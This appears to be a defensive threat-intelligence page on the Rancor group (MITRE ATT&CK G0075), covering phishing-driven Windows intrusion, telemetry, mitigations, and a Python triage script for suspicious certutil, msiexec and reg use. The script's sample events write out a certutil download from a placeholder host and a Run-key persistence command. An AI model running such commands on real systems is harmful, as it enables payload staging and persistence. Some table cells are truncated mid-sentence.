G0075: Rancor
Analyst context for executives and security teams
Rancor matters as a targeted-campaign reference point: MITRE describes the group as using politically motivated lures and malicious documents against victims in Southeast Asia. For leaders, the practical lesson is not the name alone, but whether the organization can prevent, detect, and investigate document-driven initial access that leads into Windows command execution, persistence, tool transfer, and web-based command-and-control patterns.
Executive priority
Prioritize Rancor as a validation use case for phishing resilience, endpoint visibility, and incident response readiness where the organization has users, partners, executives, or operations exposed to politically themed targeting in Southeast Asia. The ATT&CK relationships emphasize common enterprise control questions: can the SOC see malicious attachment execution, signed Windows utilities used suspiciously, scheduled tasks, WMI persistence, and outbound web-protocol C2; and can incident responders quickly preserve host and email evidence for audit and containment decisions.
Technical view
The group object has no official detection text and no platform field, but the related techniques and software are heavily Windows-relevant: Reg, certutil, PLAINTEE, Scheduled Task, Windows Command Shell, Visual Basic, Msiexec, and WMI event subscription. Detection engineering should map coverage from spearphishing attachment and malicious file execution through post-execution behaviors: cmd activity, suspicious certutil or msiexec use, registry interaction, scheduled task creation, WMI event subscription artifacts, ingress tool transfer, and outbound HTTP/S-style command-and-control. Treat these as behavior-validation themes rather than indicators of Rancor attribution by themselves.
Likely telemetry
- Email security logs and message metadata for spearphishing attachments and politically themed lures where available
- Endpoint process creation telemetry for cmd.exe, msiexec.exe, certutil.exe, reg.exe, script or Visual Basic execution, and parent-child process context
- Windows scheduled task creation and modification events
- WMI event filter, consumer, and binding telemetry or forensic artifacts
- Registry modification telemetry relevant to persistence or configuration changes
Detection direction
- Validate detections across the full chain: malicious attachment delivery, user-opened file execution, command shell activity, persistence creation, tool transfer, and outbound web traffic.
- Tune signed-utility detections carefully: certutil, reg, and msiexec have legitimate administrative uses, so prioritize suspicious command-line arguments, unusual parent processes, user context, destination patterns, and execution from user-writable paths.
- Confirm that scheduled task and WMI persistence visibility is enabled and retained long enough for incident response timelines.
- Use the Rancor relationships as threat-informed test cases, not as attribution rules; the same techniques and utilities are common across many adversaries and administrators.
- Look for blind spots in email-to-endpoint correlation, especially where attachments are detonated in email tools but endpoint execution telemetry is incomplete.
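The signed-utility tuning advice above, as an added example that is not part of the mirrored ATT&CK object or Glexia's analysis: a small Python triage routine over constructed process-creation events in which the binary name alone never fires a rule; arguments, parent process and path do. The `ProcEvent` fields, the sample paths and the domain `example.invalid` are assumptions.

```python
import re
from typing import NamedTuple

# Signed utilities the page lists as abused; every one has legitimate uses, so the
# rules key on arguments, parent process and path rather than on the binary name.
LOLBINS = {"cmd.exe", "certutil.exe", "msiexec.exe", "reg.exe", "wscript.exe", "cscript.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\(appdata|downloads)|windows\\temp|programdata)\\", re.I)
URL = re.compile(r"https?://", re.I)

class ProcEvent(NamedTuple):
    image: str     # path of the launched process
    cmdline: str   # full command line
    parent: str    # path of the parent process

def triage(ev: ProcEvent) -> list[str]:
    """Return the reasons an event looks suspicious; an empty list means no rule fired."""
    name = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent.rsplit("\\", 1)[-1].lower()
    cl = ev.cmdline.lower()
    reasons = []
    if parent in OFFICE_PARENTS and name in LOLBINS:
        reasons.append(f"{name} spawned by Office process {parent} (macro-style execution)")
    if name == "certutil.exe" and (re.search(r"-urlcache|-decode|-encode", cl) or URL.search(cl)):
        reasons.append("certutil used for download or decode, not certificate management")
    if name == "msiexec.exe" and URL.search(cl):
        reasons.append("msiexec installing a package fetched over HTTP/S")
    if name == "reg.exe" and " add " in cl and r"\currentversion\run" in cl:
        reasons.append("reg.exe writing a Run-key autostart value")
    # A LOLBin touching, or a binary running from, a user-writable path is a further signal.
    if USER_WRITABLE.search(ev.image) or (name in LOLBINS and USER_WRITABLE.search(cl)):
        reasons.append("user-writable path involved")
    return reasons
# Constructed sample events, not real telemetry; example.invalid is a placeholder domain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c start /min updater.vbs",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://example.invalid/u.dat C:\Users\alice\AppData\Local\Temp\u.dat",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Program Files\Vendor\setup.msi /qn",
              r"C:\Windows\explorer.exe"),  # benign: local package installed by the shell
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /d C:\Users\alice\AppData\Roaming\u.exe",
              r"C:\Windows\System32\cmd.exe"),
]

def run_sample() -> list[list[str]]:
    return [triage(ev) for ev in SAMPLE_EVENTS]
```

Each event yields a list of reasons rather than a verdict, so an analyst can see which combination of parent, argument and path tripped the rule and decide whether the local environment needs a different threshold.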
Mitigation priorities
- Strengthen phishing and attachment controls first: filtering, attachment analysis, user reporting workflows, and rapid mailbox search/removal procedures.
- Harden endpoint execution paths by limiting unnecessary script, macro, installer, and command-line abuse opportunities consistent with business needs.
- Restrict and monitor administrative utilities such as certutil, msiexec, reg, scheduled tasks, and WMI where feasible, focusing on least privilege and high-fidelity logging.
- Ensure EDR and Windows logging cover process creation, command lines, scheduled tasks, WMI subscriptions, registry changes, and file downloads.
- Prepare IR playbooks that connect email evidence, host triage, persistence checks, malware containment, and outbound network review.
Analyst notes and limits
The most decision-useful aspect of this object is the relationship context: a targeted group associated with malicious documents and a set of techniques that span initial access, execution, persistence, stealth, and command-and-control. Rancor-specific confidence should depend on local evidence, such as matching malware, campaign artifacts, or intelligence from the cited reporting, not on generic use of Windows utilities alone.
MITRE provides no official detection section, no explicit tactics or platforms on the group object, and only a brief description. Several related techniques list platforms beyond Windows, but many connected tools and behaviors are Windows-oriented. This take therefore stays at the defensive validation level and does not assert active exploitation, victim exposure, or guaranteed detection coverage.
Rancor
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1071.001 | Web Protocols | Rancor has used HTTP for C2. (Citation: Rancor Unit42 June 2018) |
| Enterprise | T1059.005 | Visual Basic | Rancor has used VBS scripts as well as embedded macros for execution. (Citation: Rancor Unit42 June 2018) |
| Enterprise | T1204.002 | Malicious File | Rancor attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware. (Citation: Rancor Unit42 June 2018) |
| Enterprise | T1053.005 | Scheduled Task | Rancor launched a scheduled task to gain persistence using the |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1218.007 | Msiexec | Rancor has used |
| Enterprise | T1546.003 | Windows Management Instrumentation Event Subscription | Rancor has compiled VBScript-generated MOF files into WMI event subscriptions for persistence. (Citation: Rancor WMI) |
| Enterprise | T1059.003 | Windows Command Shell | Rancor has used cmd.exe to execute commands. (Citation: Rancor Unit42 June 2018) |
| Enterprise | T1566.001 | Spearphishing Attachment | Rancor has attached a malicious document to an email to gain initial access. (Citation: Rancor Unit42 June 2018) |
Groups, software, and campaigns
S0075: Reg
S0255: DDKONG
S0254: PLAINTEE
S0160: certutil
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.3 | | Current bundle | c339a4b192ac… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Rancor Unit42 June 2018: Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
- [2] Rancor (Citation: Rancor Unit42 June 2018)
- [3] mitre-attack G0075
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.